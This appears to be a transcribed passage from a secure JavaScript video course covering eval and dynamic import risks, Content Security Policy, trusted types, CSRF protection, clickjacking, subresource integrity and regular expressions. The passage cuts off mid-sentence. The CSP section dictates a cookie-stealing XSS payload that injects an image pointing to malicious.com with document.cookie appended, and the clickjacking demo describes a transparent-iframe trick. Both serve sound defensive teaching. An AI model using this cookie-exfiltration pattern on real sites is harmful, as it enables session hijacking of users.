code. So once again, don't run arbitrary scripts with concatenated string, and especially if it comes from the user. A last way to actually run remote code, this one is for the browser, is using the import statement. So let's open a web browser. There is a primitive that's named import, and that actually accepts a string as a value. Import requires a specifier. This method, this primitive, actually will take an URL as a parameter and then will execute the script and return the module loaded. So we'll give you an example with Node.js. I've got a module named, let's create a new module, lib.mjs. export function f console.log hello. And now in the main function we will import it, but not with the import statement. We could do import f from. We could do that, and that's a static import, meaning it's not really a remote code execution. But we can also do the following, and I will use top level await, so I'm so proud of that. Await import lib.mjs f. In the browser, it will allow to resolve URLs, meaning that if you use the dynamic import with a string that is concatenated that comes from the user, a URL will be valid. And if a URL is valid, then either it can load arbitrary script from the outside, either it can load a data compacted object and run arbitrary JavaScript. So those four things I've shown, eval, function constructor, the VM module, and the dynamic import, must not be used in a production. And if you do, please never use it with any input that comes from the user. You're just opening sinks for anyone to run arbitrary code within your application, whether that's in the browser or Node.js. I'm terribly sorry for the very dramatic course, but I've seen so many production being pwned because of these four methods that I want to make sure that you are aware of it. Thanks so much. Please go watch the CSP headers and trusted type videos that are next in this course. They are very funnier. They are much more funnier than the current one. Thanks a lot. Have a great day. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkam. In this video, you won't see me on the webcam because I have to show you stuff at the bottom of the screen and my face would be hiding the important bits. We have a simple web page that actually loads an image from somewhere on the internet and that loads a script locally. This script actually just logs I am index.js. And if we start the server serving that and we reload, we see that the image is not rendered. So given its URL, maybe there's an error here. And if we check the console, the script is not loaded. It should have been loading hello I am index.js. Here, Google Chrome tells us that there are issues. So let's check what these issues are. Content security policy on your website blocks some resources because of their origin. Because their origin is not included in the content security policy header. We've got two directives that actually prevented the loading of index.js and our image. Let's check that. If we go to the network tab, close the issue, reload the page, we see that the image and the script have tried to be loaded. The browser really tried, but it's written blocked CSP. In this server, I am adding to each request this CSP policy. CSP stands for Content Security Policy, and it's one of the most powerful way in JavaScript to actually, in modern web, to actually prevent all kinds of unfaithful resource loading. Here, I've written it on multiple lines, but actually when I render it in the header, they are all on one line under the content security policy header. Script source known, image source self. What does that mean? That means that this page is not allowed to load any script by default. It can't. It can't execute JavaScript. It can't load JavaScript. And that it can only load images from its host. So you cannot remotely load images, but you could save images through the same web server. If the image was local, it would work. So to fix the script part, based on what I just said, maybe if we put script self, it will work. Actually, yes, the script has loaded. I am index.js, and the image is still not loaded. You can have multiple targets for CSP. So let's say I want to integrate jQuery into my app. I know, nobody has said that in a long time. I mean, jQuery is super cool. Let's reload this page. And here we see that it refused to load jQuery because it violates the CSP policy. Let me update the CSP, not the CSP policy, the CSP, and reload. And now it's actually accepted to load it, but now it's the jQuery part that is not allowed. Ah yes, of course, because you have to allow a domain. Let's try again. Still not. Okay. I'm not sure why this one is not loading. Let's audit the CSP. Now you even have the right to load content and invalid source. Oh! That's because this should not be with quotes. Here we are. Now, jQuery has been loaded into my app. And if I check the network, jQuery has been faithfully loaded, because for URLs you can't put quotes. There are directives for a lot of other things. You've got child SRC, which is to create new JavaScript environments, whether it's a frame, an iframe, or a worker. Connect SRC, so you decide which URLs can be loading scripts. Default for fetch, font to limit where the font comes from, image within, media for other media, objects for specific media too, script SRC that we have seen, style SRC to prevent cross-loading styles, worker SRC, and a lot of them that are still experimental. That's actually very powerful because it means that even if your front-end application is compromised and someone can run arbitrary stuff in it, that will fail. I don't know if you remember, but there is a very common way of doing XSS to exfiltrate a cookie, and that is document.create child get element by ID. You get any element, and then you inner HTML equals, and then you insert an image. Then you do https malicious.com/ and here you put document.cookie. And when this image is loaded, well, And of course you close this statement. And when this image is actually trying to be loaded by the remote server, the cookie will be leaked to a malicious remote server. Well, thanks to content security policy, even that attack is not possible anymore. However, CSP are really hard to maintain in a world where you add more and more dependencies from diverse sources in your project. That's why it first makes sense to bundle your app so you don't depend on external code dependencies such as jQuery. You have it loaded from your server directly, and that's why you should not trust remote loading stuff. Also, this means that if you want to load third-party assets, you need to know their origin for all of them, and that's actually complicated. There are also what's called report directives. There are two of them, one that is named report URI, that is deprecated but still maintained, and report to, that is experimental and not implemented everywhere. Let me show you, just for the sake of this, what report URI does. So here I will still have my policy, my unfaithful policy, because we will try to load a remote image. And I will put report URI to report. I could put a fully qualified URI, but let's just put /report. Now, if I refresh the page and I go to network, I see that there is a call to /report locally. That's a post request that actually sends a JSON object, content type CSP report, and this CSP report is an object containing details about the violation. Here we've got a URL that has been blocked. We are in the enforce mode. The directive that has been compromised was AMG SRC. We have the line, and we've got the original policy, so we know what failed. We could actually go back to our own first policy, or let's just remove jQuery from the policy. And now we have two reports, one from the image and one for jQuery, that actually tells us that there have been a violation for jQuery loading. Based on that, you can build a server to handle CSP violations, or have a third-party service monitor that for you. It's actually very important when you go with CSP that you monitor violations. Not because that will tell you about hackers, which is a good thing. You would be able to know when there are XSSs, including DOM-based XSSs in your app, but also because it's really hard to make a mistake and to add a new asset that would not be in the CSP. In that case, well, you want to know it quickly. Actually, there is also a report only mode that tells you that you don't want it to be enforced. So let's change the name of our header in the server. Let's restart it. And now, if we restart the page, we'd see that the image failed because of another mistake, but that's not because of the CSP. That jQuery loaded, however, we still got the reports. If you have been closely following, I had to change the name of the header containing the CSP, meaning that you could have a report only and a block CSP policy at the same time, meaning that, for instance, when you are not sure that something is fully mature enough, you can put it in report only. There are other very handful directives. Block all mixed content, prevent to load assets over HTTP when the load page is in HTTPS. We also have trusted types, but I don't want to spoil the next video that will go in depth about what trusted types is. As you noticed, in this video I've been cheating and going through the MDN documentation. Well, there are a lot of things to know about CSP, and the main goal here was to explain to you how they work. The detail of all of that is so complex that it's actually hard to build a CSP policy, a policy by hand, a CSP or a CSP policy. There is a module in Node named Helmet CSP that actually enables you to put multiple CSP in a friendlier way. Also, there is something I forgot to mention, is that thanks to a content security policy, you can also block inline script. Well, in order to allow them, you can use a hash to tell exactly which script is allowed. So if we click on this documentation, there must be something about hash. Yes, so you can actually provide as a value in the CSP a hash with a nonce to say this script that follows this hash is actually valid and executable. That's even more constraining, and I would recommend to have a pipeline in production for deploying that, or to not have inline scripts. Okay, so now we have learned how CSP, or Content Security Policy, can be used to prevent loading external resources. In the next video about trusted types, we will see how a CSP or a content security policy can actually be used to dynamically update malicious code. I hope you enjoyed this video. See you soon and have a great evening. Hello and welcome to Secure JavaScript Programming with Vladimir.Jurkem. This is the last video on the XSS and remote code injection course, and I have to admit it's my favorite one. In this video, we will be talking about trusted types. Before you watch this video, make sure that you have watched the Content Security Policy video, because we will use that and we will use also the things discovered in the RCE video, Remote Code Injection and Other Things video. So make sure to have watched the whole XSS course before coming here. Trusted type is the cutting edge technology to fight XSS and remote code injection in the browser. This won't apply to Node.js yet. Here I've got a simple page, and if I check how it has been loaded, I can see that it has a specific content security policy that contains require trusted type for script, but also a value with trusted types log policy. We will focus on the second one, trusted type log policy. What could that mean? Well, I have created a trusted type policy and I named it log policy. Okay, it will make sense in a few minutes. Just hold on until that. What does that mean? That means that if I try to do eval and then console.log hello from eval, I actually get an error that tells me unquote eval error refused to evaluate a screen as JavaScript because this document requires trusted type assignment. Okay, that's weird. Document dot get element by ID. Of course, I don't have any element with an ID here, so let me create one pretty quick. Target, and let's come back. Target equals, and target dot inner HTML equals, and now we fail again, and we have failed to set inner HTML property on element. This document requires trusted HTML assignment. Let's try one last thing. Script equals document.create element script script.src equals, well, once again this failed with the failed to set the SRC property on HTML script element. The document requires trusted script URL assignment. That means that 3 of the main things for XSS and remote code execution right now have been somehow disabled. Let's go in depth to understand what I did. Here you can see that I am also loading a script named policies.js. If we check this script, I create a policy with the trusted type API. As you can see, it's so cutting edge that WebStorm does not yet know about these methods. I call trusted types.createPolicy, and the first argument I pass is a string. That will be the name of our policy. We can have multiple policies in the same document, and in that case we would need to tell trusted types here that we allow another policy, and both of them will become available. So let's allow only log policy, and let's also create a new policy together. I will create a new policy that I will call other policy. And for create HTML, actually, I will just allow str. So create HTML is a method that we can define. It will be called with the string that needs to be put as a value for inner HTML or outer HTML. We can have other arguments, but I won't go in details about them right now. And it can either return a string that will be the actual string used for HTML, inner HTML thing, or it can throw an exception to prevent. So let's do create HTML, and we'll return str.replace. And now we want to replace this character. Let me quickly check my regex, because I'm not a regex. I don't have my regex mind ready right now. Dot replace. Okay, yeah, that's right. Replace all of these ones by an empty string. So we'll prevent loading tags. And same thing for the closing ones. That must be a regex. I don't know why I put strings. Too many string management today. And put an empty string. So this one will actually replace HTML tags by something else. In the real life, I would recommend you use a library such as DOM Purify if you want to do that. Create script. Well, I want to prevent all script creation, so throw new error, don't create scripts. And now for create script URLs, we will do the same thing. Don't load more. And here we are. Now we've got this other policy. What it will do is that when asked about sanitizing HTML, it will just replace the tags by things that are not HTML code. When asked to create a string, a script, it will refuse, and when asked about loading a remote script, it will refuse. How do you use that? Well, you've noticed that I have actually added that to the global scope, so I can get them. I get an error. Remember, I said I would only allow the first policy, the log policy. And here we tried to create the other policy. And it's not in the list of allowed policy. So it refused to create it, and we got an error. That's what was expected. So now, let's allow this. Restart, and now it's happy. So, let's try to get our document, our target. Document gets element by ID, target. Okay, target, I get it, here it is. Now let's do again target. Oh, Vlad, why are you here? Sorry, I'm going on the right hand side, so I don't plug this view. Target.innerHTML equals b hello /b. This fails again because it violates the policy. How do we use that? Well, at this point, we need to get the policy. And on this policy, remember, we created 3 methods. Create HTML, create script, and create script URL. Because we want to create something that will go in an HTML things, there are 3 kinds of things: HTML things, script things, and script URL things. We will do create HTML, then we will place our string, and let's put that in a new variable. So if we look at this value, we see that it's a trusted HTML object that has a value. And now we realize that my regex were poorly made because it's terrible at sanitizing stuff. That's why you should use DOM Purify and not the code I give you here. If we run target inner HTML and put new hello there, it will actually work. It will be accepted because this thing is going through a valid purifier function, a valid trusted type cleaning up policy function. Okay, so we are able now to make sure that in case of XSS, you have the control. It's not possible to change the value of a policy once it has been created, and it's not possible to use a policy that has not been defined in the content security policy. So let's say that you want to create a custom script to decide the URL of a target you can load. Let me use my other policy, create script URL, which puts something here. It actually throws an exception because we wrote that we want to throw an exception. However, str URL, we can do a new URL str URL. Let me try that in the browser first. Yeah, new URL. Okay, and we get the protocol and host. Okay, right. So we could do something like if url.host is not equal to localhost, sorry about that, sticky fingers, throw new error, invalid host, and here we can do return string URL. Let's start that, and I will do document dot other policy dot, I always need to copy paste them because I can't remember the name of this function for the life of me, /cdn.o, and here it actually fails because it's an invalid host and we get the value we put. If I put local host, it will work. And now I can use that to dynamically load new scripts in my page. Let's sum up a bit. You can define custom policies only once and you can't override them. In all policies, you can define something for custom HTML nodes, custom scripts to evaluate, and custom scripts to load. When you want, then when a policy is enabled through a content security policy with an entry named trusted types, when this is enabled, well, it becomes impossible to use inner HTML, eval, or script.src from JavaScript without first of all going through a call to the policy. This means that even if someone managed to run arbitrary code on your page, they won't be able to load untrusted things or to inject new nodes dynamically. This is the real way to prevent DOM-based excesses. This is still cutting-edge technologies and pending a lot of browser adoptions. This is a technology developed by some of my very good friends at Google, and I really recommend you take a look at the specification. It's not that bad. Thanks so much for watching this video. I hope it was clear enough. Once again, this is very cutting-edge technology in web security, and you will be able to say that you learned it on InfoSec Skills first. Thanks a lot for watching it. Have a great day and see you soon. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. In this video, we will talk about CSRF, or cross-site request forgery. Sometimes I prefer to refer to the OWASP documentation, and that's actually a very good source of truth toward your journey as a secure programmer. So I will recommend you learn about the cheat sheet series from the OWASP. Today, we will focus on CSRF. CSRF happens when a malicious website actually performs operation toward another kind of remote resource against which the user is authenticated. In other words, A CSRF attack works because browser requests automatically include all cookies, including session cookies. So if you have a formula on a website and you want to cross-post on another website, well, this will work. The impact is of course limited by the application and privilege available on the target website. So let's take an example. Here I've got my website to subscribe to my newsletter on localhost 3000, and here I've got another website that could contain a form with totally other data, but the user doesn't know that actually by doing that they will post something on the other form. So if I do this, actually it's posted on the other website. So we tricked someone into performing an operation from a website to another through formulas. This one is a very, very bad CSRF because you realize it immediately, but sometimes the examples must be easy, so the idea is shared. Eventually, CSRF can bring you all the capabilities of the attacked website with the credential of the user. Also, it's worth noticing that CSRF, all the protection regarding CSRF can be bypassed if there is an XSS on the target website, because in that case the attacker doesn't need to craft fake websites to have you do operations. They can just, run arbitrary code on the attacked website and use your token and your authentication privileges without having to do the cross-website part. But we will go back to protections a bit later. So one of the legitimate questions is, how can I prevent, as the owner of localhost 3000, how can I prevent anyone from the other domain to push in my own website? Well, here, let me find the right page. Here I've got the form on index.ags. The historical solution when you've got server-side rendering is actually to add a new field in the formula, a field without label, of type text, which has the name CSRF token. I use an underscore because it's easier for me when we'll use it in JavaScript. And here you will add immediately a value. So since I am in a rendered template, I can use this. Now I need to update my controller to provide me with a token. And since I am a responsible citizen, I will use a strong token generation. For instance, the UID module in Node.js is pretty good. Also, on most recent versions of Node.js, there are UID generation directly on the crypto API. So what we want is UID v4. UID. Yeah, I'm not a big fan of destructuring, but that's because I am old. V4. Here I've got a UID. But as you realize, well, I don't know if this one is valid. It doesn't make any sense. So what I need to do is to keep in my database, along with my session, the list of UIDs. So let's imagine that's a database, and instead of doing that, we will do this. Add token. Okay, and now we know that you have this field. So if I restart the project and we go back to the Express app, we see that we have a field here. So it's nice, it's good, but it doesn't do all what we want yet, and it creates weird user experience. So the first thing we will do is we will hide this field in the HTML. And now it's over, and the form is back to be user-friendly. And then the second part is to actually check the token. So when we have a new subscription, we need to check that it is in the right list. So here, if rec.body dot, I think I named it CSRF token, const rec.body dot CSRF token, if no CSRF token or token has, and we put a negation here. So we check that if there is no CSRF token, or if the CSRF token provided is not in the list of acceptable tokens, then we will just res.end well tried, and we need to return it, so it's broken. Also, we don't want the CSRF token to live forever, so we need some kind of way to remove them from the database after a while, and for that you need to use a database that has expiration or other scripts like that. I usually recommend using Redis for this kind of thing, because you can put an expiration pretty easily on that. And when the token has been used once, you need to remove it, so the user can't use it twice. So this should actually give us what we want. Ooh, you saw my personal email address at world.com. Has a fun define. What did I do? What did I do? What did I do? When I made mistakes in live demos, my first code is actually to debug. I probably have a circle dependency import issue. Let me try that. Ooh, I know. That's just me being a terrible developer, because in this piece of code I overwrite the value of this. That's weird, because autocomplete should be off, so I should not have my email addresses shown like that. So let's go back. Hello at world.com. Good thing that my email addresses are all public and that's no sensitive data, right? And here it worked. So if I go on all, I see that I have a subscription, but if I go on the other side, it actually tells me that the CSRF protection blocked me from doing that. So this historical way of blocking CSRF attacks with the hidden field is actually pretty much outdated, because it still works with PHP, with Ruby on Rails, with everything where there is server-side rendering. But in a modern world, you will probably have an API, and the code, the front-end application might be rendered server-side, but only at the first rendering cycle if you're using stuff like Next.js, and you might have just a single-page application with an API. So that's not too bad. That's actually good news, because there are ways to put the CSRF token actually in a cookie. So you've got the CSRF module in Node.js, where the token, the CSRF token, is placed in the cookie. And if you do that, which is great, you must use same site and HTTP only. Why is that? Because actually, if it's not HTTP only, anyone can use that. Same site, anyone can use that too. If you have the same site to strict, no other website, as long as the browser understands the same site flag on the cookie, no other website will be able to use this cookie. So it won't be able to actually use it as a CSRF token, since it will be available only for your domain. It will refuse to use that. That's also one of the reasons why you want most of your cookies to be same site, because you don't want cross calls between the cookies. Another way to limit cross-site interactions is to disable, and often they are disabled by default, cross-origin resource sharing. Depending on how your website is built, enabling cross-origin resource sharing might give access to certain functions of your website if you are using non-standard way of building web applications. So you also want to make sure that your web server does not accept cross-origin resource sharing and will deny all of them. So if we check the recommendation by the OWASP, they also recommend to use a HMAC on the token, so you are sure that the token has been issued by you and signed properly. You can also, yes, that's a very fine point, you don't have to save the token. You can also use the same behavior as with a JWT or JSON Web Signature and sign the cookie, so the CSRF token, so you are sure that you issued it and nobody else issued it. You have to remember that any XSS actually defeats all of that, and that's very important. XSS attacks give a full access to your website to the attacker in terms of operations they can do on the behalf of your user, because they can run arbitrary code within the same domain. So even same site policy won't save you in time of XSS. CSRF are easier to put in place, but easier to defend against. XSS, they are hard to find, but when you have them, well, you are playing in God mode, and that's why there are things like trusted types that we've seen in the course about XSS that enable to have a consistent protection browser side against XSS. Also, that's the interesting part, do not use GET request for state changing operation. This actually, by default, you don't have protection for CSRF on GET operation. It's mostly on POST operation, on formulas. Well, if you have GET requests with changing, that can change the state, like make a payment, send a message, you want to have the same protections against CSRF. Altogether, the two interesting parties are, if your framework provides CSRF protection, use it, and implement a user-based interaction protection. This can be a lot of things. This can be having multiple clicks to be able to perform something. This can be multi-factor authentication. This can be email validation for the most sensitive operation, like a bank transfer. But you don't want that a single HTTP request would be enough to perform a high privileged operation on your application. That's it for the video about CSRF. I invite you to follow the rest of this course where we'll talk about clickjacking and sub-resource integrity. It's actually one of my favorite courses in that learning track. Thanks so much for watching it and have a great day. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. Okay, so in this video we talk about clickjacking. It's the first of the three browser security elements in this learning path. Clickjacking happens when someone creates a malicious page and embeds a legitimate page in it and trick a user into clicking on certain elements of the legitimate page. This relies on poor configuration of this web server serving the legitimate page and very malicious intent from another user. As my high school math teacher used to say, a demo is always better than a speech, so let's go for a quick demo right now. Here I've got a banking website which is like very super secure. It's called Super Secure Bank, so must be secure. You can see your balance in dollar and the last transaction, and you spent $10 for lunch. There's also a big button that says, a big link that says transfer money to a hacker. And they're not sure why it's there. It's mostly there for the sake of the demo in my case, because there are countless ways to hack around it, but that's actually sorry about that. That's actually the link we want to trigger the user to click on. So if I click on it, I can see that now the balance has been reduced by $1 million, as if it was an Austin Power bad guy. And if we re-click on it, we lose 1 more million. And each time we click on this link, we lose $1 million. This is terrible. It's not that bad because the bank is so secure that each time they restart the servers, they forget about all the money being sent to the hacker, and you get back to having a lot of money on your bank account and only spent $10 for lunch. Lucky you just need the server to restart once a day, so all the money you spent is forgotten. Okay, jokes apart. The goal here is to trick someone into clicking on this. I designed a fake web page that could happen in any case. That could be loaded in any situation. That could be a pop-up. That could be a website I tricked you to click on. I could have paid ads on Google or Twitter or Reddit to have you click on this page. The question is not that much how I got you there. I might have pawned the server and paid this page here. The question is, how can I get you to click on this button? That's my goal here. So here the text goes, congrats, you won a prize, like the mobile phone of your dreams. Dreams, not dreamt. Sorry about that. You dreamt of. No, it's okay. The mobile phone you dreamt of. Or the game console that is out of stock for some reasons. That can give you a hint on when this video was recorded. Don't read the small line. Click here to claim your prize. And when you click, nothing happens. So you click again, and nothing happens. So you are mad. You just go back to something else. You were that close to get a new mobile phone or a new gaming system, and you're so mad. And a couple days later, you go to your bank account and you check your balance, and boom, you have actually sent $10 million to a hacker. How did that happen? You did not notice anything. That doesn't make any sense. How did this money leave your bank account? And you are terrified. Okay, so let's go in detail about what happened. In this page, there's actually an invisible iframe. here. That redirects to the page of your bank. So let me change the style so it will be more visible. Here, if you see it, we've got the web page for Cybersecurity Bank embedded in an iframe. But because of the CSS, of the style of this page, well, this is fully transparent. So what did I use? I used position absolute. I fixed the position depending on where I wanted to. Conveniently speaking, the link to click on was at the top of the attacked page, otherwise I would have to play with some offset magic, and I'm terrible at HTML and CSS. I'm very good at JavaScript, but not very good at designing. You probably have noticed that by now. So I just place it conveniently where I want and put opacity to 0. And then I build the rest of the page, which means that here is actually the link to the transfer a lot of money to a hacker. This is this link that is actually embedded in this page. Let me put back the opacity at a good level. Sorry. Up here we see that the link just falls on the button. That's how we tricked people into clicking on that. And that's why you may get message from bug bounties, people will tell you there's a click checking, or that's why there are so many weird websites with iframes. Historically, this happened a lot to make people click on like buttons or subscribe buttons on Facebook. Because since this is an iframe, it's actually running in the domain of the original website in your browser, meaning that this iframe has access to your cookies from Secure Bank. It has access to the application part, so the local storage of Secure Bank. Here, localhost 4000. Here, localhost, you've got the cookie from Secure Bank. All of this iframe, actually, you can even see my previous GraphQL stuff and Algolia stuff. All of this has access to the store of the domain that is attacked. Okay, so how do you protect against that? It seems very complicated. Well, the first thing you must do is to use the same site cookie. You must make sure that your cookies cannot be accessible in another website. So you must use same site. That will prevent the cookie to be valid in the iframe. Then, if I go to the web server here, I've got one first solution. Let's start with the historical one. Historically, there's a header named xFrame option that can have the value deny or domain, if I'm not mistaken. But anyway, the one we want to put here is deny. So now, when I reload the malicious page, I see that I have a empty iframe because localhost refused to connect. And if I go to inspect, then I will have refused to display localhost 4000 because it's in an iframe with xFrame option deny. So if I go back to the opacity being at 0 here, well, we just see void here. We don't get the feedback about this not being loaded, and the iframe is just transparent but does not exist. If we check at the network level, we can see here that it has still been loaded, but that is the request still happened but could not be loaded. And if we check the elements on the page, we see that actually there's a page, but it's a default page integrated by my browser directly. If we check the style, for instance, there will be some Chromium copyright claims. That's actually the page we've seen here. Let me put it back. That's the HTML for localhost refuse to connect. So that's the first way of doing that. The second, that gives the same result, is actually using a content security policy. And you know me, and you know that I love content security policy because they are so powerful. Well, with content security policy, you can define frame ancestor to none. So you will get the same result because it violates content security policy on the network. You will see the same thing. The main difference is that with the content security policy, you can also choose specific domains where you're allowing to be embedded. So if for some reason you need to allow people to put your website in an iframe, well, you can do that through a content security policy. Also, content security policy have a report URI. Let's just put /report, it's not important. They have a report URI, meaning that when this happens, you will actually get a report sent to your monitoring tool, and you know that some people try to attack you, and you know who is trying to attack you because it will be coming from this domain. So that's why content security policy is the most powerful way to block embedding in an iframe. Sadly, it's not supported by all browsers yet, or at least not by all historical browsers. Most modern browsers support it. And I let you refer to the MDN documentation so I don't show you outdated data whenever you watch this video. That's it for clickjacking. Thanks so much for watching this video. Please check the rest of this course about browser security. The next one will be about cross-origin resource sharing, and we also have a video about resource integrity coming your way. Thanks so much, have a great day, and see you soon. Hello and welcome to Secure JavaScript Programming with Vladimir de Turckheim. In this video, we will talk about sub-resource or resource integrity. So let's take a web page. It has a style sheet and it imports a script. Well, now that's pretty much the whole internet that works like that. A few style sheets and a few scripts. We can see that this page has a hello paragraph that is in brown, and that the script actually logs hello world. In the modern web, well, nobody really, not a lot of people still write their style sheet directly and have JavaScript code that is immediately executable. Now you use CSS preprocessors, for instance, Sass, SCSS, Stylus, Less, or maybe you even do CSS in JS if you are in a cutting-edge technology scheme. And a lot of developers in the JavaScript world, in the JavaScript front-end world, actually don't write plain JavaScript anymore. They either use JSX, Vue template, so the file they build is not directly JavaScript, and they might use higher level languages such as TypeScript or CoffeeScript, at least if you are doing Ruby on Rails 10 years ago. Well, in order to obtain real JavaScript code, you need to transform it, and there are CI steps, and there are a lot of people that can actually modify your code. And when you have done that, you can even untrust the CDN that will put your website online, and will actually be able to modify and inject scripts. So for instance, you can inject spyware in the web page. If you are the CDN, you can inject as many scripts as you want on a web page, and you can modify the script and inject code directly in the scripts rather than using script tags. Well, at the end of the day, the internet needed a way to make sure that the script used by the web page and that the style sheet used by the web page were actually the one the developer intended to use, because there are so many steps, and if you actually outsource the integrity hash creation to someone else like a CI step or a CDN, you're probably in big trouble. So let's understand what sub-resource integrity is. Let me open my terminal, and we will copy paste a command and compute the sub-resource integrity for index.js. So here I start with index.js. Let me do something. Okay. So let's try the whole command properly. Here, that's a shell command using pipes. So the first of the three commands we use is cat index.js, which actually takes the content of index.js. That's the content of our file. Then we will use a second command in which we will ask OpenSSL to compute a digest for this file as an output as a binary with the secure hash function SHA 512. I chose SHA 512 because it was the strongest available and mostly supported by all browsers. 384 is also a right choice, and maybe you can even have both supported. You need to check the browser compatibility table, but just make sure you don't use SHA 1 generation hash, and if possible use SHA 3 generation hash functions. And the last part of the command, OpenSSL enc base 64, actually tells OpenSSL to give us a base 64 view on this item. So all of that is a base 64. You need to forget the percent that is injected by ZSH. Is the integrity check for index.js with SHA 512. So now we need to update the script import in the web page, and we use the key integrity. And now we need a way to tell the browser which hash function we used, SHA 512. If I wanted to compute the SHA 384, I would actually tell the browser this is SHA 384 dash the hash. Okay, now let's open the page. As you can see, nothing changed. We already have the hello world printed here. Now let's change the value of hello world with hello world bang. If we refresh the page, it still works because there are caching mechanisms that makes my demo terrible. If we reload the server, so there is no caching, and we reload the page, we have failed to find a valid digest in the integrity attribute for resource index.js. The resource has been blocked, and we don't have hello world. This means that now, since the developer has put the hash here, it can't be tampered without changing the hash. And of course, you have ways in the browser to create the life cycle of the hash. We can do exactly the same thing for the style sheet. and we do integrity SHA 512 up. And now let's save this. Let's reload all of that. Yeah, it worked. And if now I change my style, and I will show how terrible my tastes are in terms of color, and I'm sorry for colorblind people, I am partially one of you. The hash has been refused and the style sheet has been refused. Sadly, right now, as of internet specification, integrity check is only a recommendation, meaning that browsers don't have the obligation to support it. Also, it only applies to script and link. There is no recommendation right now about supporting other media such as images, and that's probably a shame. Okay, I hope you understood what sub-resource integrity was, how it was useful, and how you could generate a hash. Of course, if you have Node.js, generating a hash is actually, and encoding it in base 64 is actually pretty easy, and that's an exercise I will let you try at home. Thanks so much for watching this video. I hope you enjoyed it, and see you soon for other JavaScript security courses. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. In this video, we will talk about regular expressions. Regular expressions are a very complex feature in JavaScript, and they can lead to some security issues. So before we dig into the next video with how regular expression can bring denial of service, today we will dig into what are regular expressions in JavaScript and why they matter. You might realize that in this course, a lot of the courses are more about to understand the insides of JavaScript rather than understand security issues directly. That's because the devil hides in the detail. Well, regular expression is a class in JavaScript, and you have two ways to define a regular expression. The first one is to use a direct expression. So to build a regular expression, you will start with the slash character. Then you will write your regular expression. So let's say we want a regular expression that matches foo. Don't worry, we'll go more in details about regular expression after. Then you can close the regular expression, and you can put some flags here. The flags are actually tokens that will tell the engine on how to manipulate the regular expression. One of the very used flag is I for case insensitive. You can also build a regular expression from a string with the regular expression constructor. As a first argument, we will write the regular expression, and as a second, the flag, or the flags. So if we console log array and array2, even if they are two distinct objects, we see that they have the same string representation, and they will match the same things. So we have two different instances of regular expressions that have the same content. How do you use a regular expression in JavaScript? Well, there are two ways to do so. Either you use the methods that are on the regex class, so namely exec and test. Either you use the methods on the string class. So let's start with the method on the regex class. We have a first regular expression that matches AB. Let's just take that. It matches AB. If we want to use exec on the first string, which is ABC, we would do console.log reg.exec string. And because we want to show deep JavaScript stuff, let's put it multiple times. Okay, so here we see that it has actually matched AB multiple times. Let's put something else here. And let's do this. Here we see that it gives null. So either it will return a table, either it will return null. Now let's change the regular expression with the G flag. And we can see that the value has changed. Okay, let me do that again. With the regular expression just matching AB, and let's put AB in the string, it tells us that it matches AB, so there is a match, that the index is 0. But we know that we have AB twice. So we can use the J flag to tell the regular expression that we want to match AB multiple times in the same string. However, as you can see, the first call returns the same thing as previously. The second call will return something else with the second match, because it tells us about the second match. And then it tells us null, and then it goes back to the first match. That's actually because regular expressions in JavaScript have a state. So if I do console.log reg.lastIndex, we will display the last index property of the regular expression, and if we run that, we saw that it's 2, now it's 4, null, and go back to 0. The regular expression has a cursor, and if you call exec multiple times and you have the J flag, it will actually impact the cursor. That's why I usually don't recommend using the exec method at all, because it can bring some very weird situations. For instance, if I use a second string, there will be no second match. However, there is AB in this string. But since the cursor is at 2 and that the match is at 1, well, it doesn't work. Regular expression have a state. You can, of course, init it by setting it back to 0, but that might be extremely complex to follow up with. Also, you've got another method that is named test. Test just returns a boolean. So let's do something else. As you can see, I'm very imaginative with my names, with my values, test string, and now string 2. If we run this, we saw that the first one returns true, because this string matches the regex, and this one returns false, because this string does not match the regex. That's already a lot, and now we need to move on to what are the methods on the string class regarding regex. Just give me a sec. Sorry. So you've got multiple methods on the string class, namely match, match all, search, replace, replace all, and split. So let's take a regex and let's put, and here let's put something else so we can try both. If we use the first string and we do str.match reg, and I forgot the console.log, and let's do that with the second string too, twice. Here we've got all the ABs, so the state of the regex doesn't change, which is logical because we are not calling method on the regex class, but on the string class, and here it returns null. So we have a table with the list of things. Now, if we want to try with search, Let's see what search gives us. Search gives us the first index of the pattern. So if I do this, we will get 3. It gives us the first index of the substring that matches the regex. Now let's try with replace. Replace takes a second argument. Up, replace. And actually tells to replace the value with this one. You can notice that when we use match or replace, they give a result that is similar to what we would expect of match all or replace all. That's because we used the G flag on the regex. If I remove the G flag, only the first occurrence is actually replaced. And if I do match on the first one, now that we remove the G, only one is actually found. Okay, so far so good. The last one is actually one of my favorite methods. It's split. Split actually returns an array by splitting around the substrings that match the regex. So in the first case, yeah, of course it removes the pattern, so I need to put a bit of buffering. In the first case, it returns only Fs because it splits the string on ABs, and that's pretty cool. On the second one, it returns an array with a single element because the string is not inside it. And if we put a J, it will actually not change anything. This method is not impacted by J, unlike all others. Okay, that's how you use a regular expression in JavaScript. But how do you build a regular expression? Well, I will tell you a secret, but don't tell the rest of the world. I'm actually a very lazy developer when it comes to regular expressions. So I go always to this website, regex101.com. I select JavaScript. It's actually important because different technologies have different JavaScript regex coverage, and then you can build a regular expression. Before building an expression, I usually recommend doing a test string first. And now we want to build a regular expression, for instance, that will capture the word hello. So first of all, let's build a regular expression that matches the word hello. So this one is easy. We just need to write hello, and now we already have modifiers that are available here, and it tells us about it. And now we know that hello is actually matched. When you do a regular expression, you might want to use capture, which actually gives you the substring as a result of the command. It gives you an easier way to get the thing you match directly. So here, with parentheses, we are able to capture the string hello. Let's remove the parentheses. And now let's say we just want to match a word, any word. So a word is actually something that is not a white space. And in that case, you can use a shorthand name anti/w that actually matches every letter. And then you can use a transformer plus. Let's go to the definition, to the explanation of our regex. This W matches any word character, anything in A to Z, or capital A to Z, or O to 9, with the underscore. And the quantifier tells us that we want to match that between 1 and unlimited. So we could rewrite this regex A to Z. In that case, it will match any lowercase word. Then we want also uppercase word. So if I write hello world, it still works. But here it matches the characters one by one. And we want to tell it that we want to match them by group. So we can use the plus to tell at least one of them, and it builds group. But plus is actually equivalent to this. This is a way to write how many characters you want to grab. So let's say I just want to grab at most 3 characters. I will do it this way. Meaning that just take between 1 and 3 characters. So the first match is hell, the second match is low, then we have a white space that doesn't qualify, we've got war and LD. Okay, but let's say now that I want to match only the first 3 characters of the first word. I will do 1, 3, and then I will use another quantifiers that tells only with the start of the line. This 